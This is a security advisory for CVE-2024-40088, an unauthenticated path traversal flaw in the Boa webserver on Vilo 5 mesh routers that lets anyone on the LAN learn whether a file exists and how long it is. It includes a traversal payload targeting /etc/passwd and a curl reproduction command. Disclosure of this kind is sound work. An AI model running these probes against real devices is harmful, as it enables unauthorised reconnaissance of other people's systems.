CVE-2024-40088: Arbitrary File Enumeration in Boa Webserver
- CVSS Score - 4.7, Medium (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)
- Affected Product - Vilo 5 Mesh WiFi System
- Affected Firmware - versions <= 5.16.1.33
- Overview - the custom TCP service running on port 5432 has several functions, one of which includes spinning up a webserver stored at
/hualai/boa/boaon port 8023. Since this service has no authentication, anyone can spin up the webserver. This webserver not only offers up system logs to anyone with access, but by putting path traversal payloads../../in the path, any file can be enumerated from the server. - Description
- The Boa webserver is designed to offer up log files for the user to retrieve. The path sent in the HTTP request is processed by the server and checked that it is a valid file relative to the
/tmpdirectory. This means sending an HTTP request with the first line likeGET /../../../etc/passwdwill manipulate the server into checking the existence of the/etc/passwdfile. Then, the length of the user-supplied file is passed in as a parameter, and that many bytes of the log will be returned to the user. - For example, if
/../../../etc/passwdwas supplied and the/etc/passwdfile is exactly 27 bytes long, then the first 27 bytes of the logfile will be returned. If the file length is longer than the logfile, then null bytes will be returned (assuming no memory sections are placed afterwards).
- The Boa webserver is designed to offer up log files for the user to retrieve. The path sent in the HTTP request is processed by the server and checked that it is a valid file relative to the
- Steps to Reproduce
- Run the command
curl https://192.168.58.1:8023/../../../../etc/passwd -k --path-as-isand note that a 404 "Not Found" error is not returned.
- Run the command
- Impact - Anyone on the LAN can enumerate the existence of and length of any file on the filesystem. Note that they cannot read the actual contents, however.